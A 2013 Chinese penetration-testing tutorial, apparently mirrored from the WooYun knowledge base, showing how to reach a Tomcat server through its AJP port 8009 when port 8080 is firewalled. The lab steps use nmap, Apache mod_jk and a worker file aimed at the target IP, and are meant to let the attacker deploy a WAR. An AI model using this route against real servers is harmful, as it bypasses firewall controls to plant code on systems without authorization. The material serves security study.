Tomcat的8009埠AJP的利用
作者:
·
2013/11/15 12:28
Tomcat在安裝的時候會有下面的介面,我們通常部署war,用的最多的是預設的8080埠。
可是當8080埠被防火牆封閉的時候,是否還有辦法利用呢?
答案是可以的,可以透過AJP的8009埠,下面是step by step。
下面是實驗環境:
192.168.0.102 裝有Tomcat 7的虛擬主機,防火牆封閉8080埠
192.168.0.103 裝有BT5系統的滲透主機
首先nmap掃描,發現8009埠開放
BT5預設apache2是安裝的,我們僅需要安裝mod-jk
#!shell
[email protected]:~# apt-get install libapache2-mod-jk
jk.conf的配置檔案如下:
#!shell
[email protected]:/etc/apache2/mods-available# cat jk.conf
# Update this path to match your conf directory location
JkWorkersFile /etc/apache2/jk_workers.properties
# Where to put jk logs
# Update this path to match your logs directory location
JkLogFile /var/log/apache2/mod_jk.log
# Set the jk log level [debug/error/info]
JkLogLevel info
# Select the log format
JkLogStampFormat "[%a %b %d %H:%M:%S %Y]"
# JkOptions indicate to send SSL KEY SIZE,
JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories
# JkRequestLogFormat set the request format
JkRequestLogFormat "%w %V %T"
# Shm log file
JkShmFile /var/log/apache2/jk-runtime-status
jk.conf軟連線到/etc/apache2/mods-enabled/目錄
#!shell
ln -s /etc/apache2/mods-available/jk.conf /etc/apache2/mods-enabled/jk.conf
配置 jk_workers.properties
#!shell
[email protected]:/etc/apache2# cat jk_workers.properties
worker.list=ajp13
# Set properties for worker named ajp13 to use ajp13 protocol,
# and run on port 8009
worker.ajp13.type=ajp13
worker.ajp13.host=192.168.0.102 <\---|這裡是要目標主機的IP地址
worker.ajp13.port=8009
worker.ajp13.lbfactor=50
worker.ajp13.cachesize=10
worker.ajp13.cache_timeout=600
worker.ajp13.socket_keepalive=1
worker.ajp13.socket_timeout=300
預設站點的配置
重啟apache
#!shell
sudo a2enmod proxy_ajp
sudo a2enmod proxy_http
sudo /etc/init.d/apache2 restart
現在apache的mod_jk模組就配置好了,訪問192.168.0.103的80埠,就被重定向到192.168.0.102的8009埠了,然後就可以部署war了。
對滲透有興趣的朋友,加我多交流 :)
本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!
相關文章
- tomcat啟動出現錯誤:Failed to destroy end point associated with ProtocolHandler["ajp-nio-8009"]TomcatAIProtocol
- 解決啟動Tomcat報錯:Failed to destroy end point associated with ProtocolHandler["ajp-nio-8009"]TomcatAIProtocol
- 解決Tomcat啟動報錯問題:Failed to destroy end point associated with ProtocolHandler["ajp-nio-8009"]TomcatAIProtocol
- 嚴重: Failed to destroy end point associated with ProtocolHandler ["ajp-nio-8009"] java.lang.NullPointAIProtocolJavaNull
- 解決啟動報錯:Failed to destroy end point associated with ProtocolHandler["ajp-nio-8009"]AIProtocol
- Tomcat(8005,8080,8009)埠占用問題常見原因及解決方法Tomcat
- tomocat 執行jsp檔案提示"Failed to destroy end point associated with ProtocolHandler ["ajp-nio-8009"]"JSAIProtocol
- 解決ProtocolHandler ["ajp-nio-8009"] java.net.BindException: Address already in use: bind問題ProtocolJavaIndexException
- Tomcat監聽443埠的方法Tomcat
- Netweaver的埠號和Spring boot內嵌的Tomcat埠Spring BootTomcat
- 修改Tomcat服務中的埠配置Tomcat
- 獲取當前Tomcat例項的埠Tomcat
- liunx下檢視tomcat佔用的埠號Tomcat
- 解決tomcat埠占用Tomcat
- tomcat埠占用問題Tomcat
- 入侵攻擊實戰中被利用的埠(轉)
- 解決Oracle XDB與Tomcat等的8080埠的衝突OracleTomcat
- tomcat 443埠無響應,急!!!!Tomcat
- tomcat埠被佔用異常Tomcat
- 利用nginx的stream模組實現內網埠的轉發代理Nginx內網
- 利用“TCP/IP篩選”功能限制伺服器的埠TCP伺服器
- 利用Nginx+tomcat實現memcached的資源接管NginxTomcat
- Tomcat修改80埠,埠被佔用,System佔用80埠問題解決Tomcat
- Tomcat與Myeclipse的版本一致和8080的埠占用問題TomcatEclipse
- Tomcat埠占用問題解決方法Tomcat
- Tomcat6.0 配置多埠訪問Tomcat
- tomcat埠被佔用解決辦法Tomcat
- 如何解決Tomcat埠號被佔用Tomcat
- nginx多個專案放在不同的tomcat中,共享同一個埠NginxTomcat
- tomcat 8443埠開啟,配置JDBC連結池TomcatJDBC
- tomcat埠號直接跳轉到專案首頁Tomcat
- Cacti監控一臺Web伺服器上多個Tomcat埠的實現Web伺服器Tomcat
- tomcat下多個埠,多個應用(轉載)Tomcat
- 利用命令檢視win10系統中開放埠的方法Win10
- windows的139埠和445埠的區別Windows
- 利用135埠漏洞入侵個人電腦(轉)
- 實現埠對埠的聊天 (轉)
- Java Web之tomcat修改80埠和專案對映JavaWebTomcat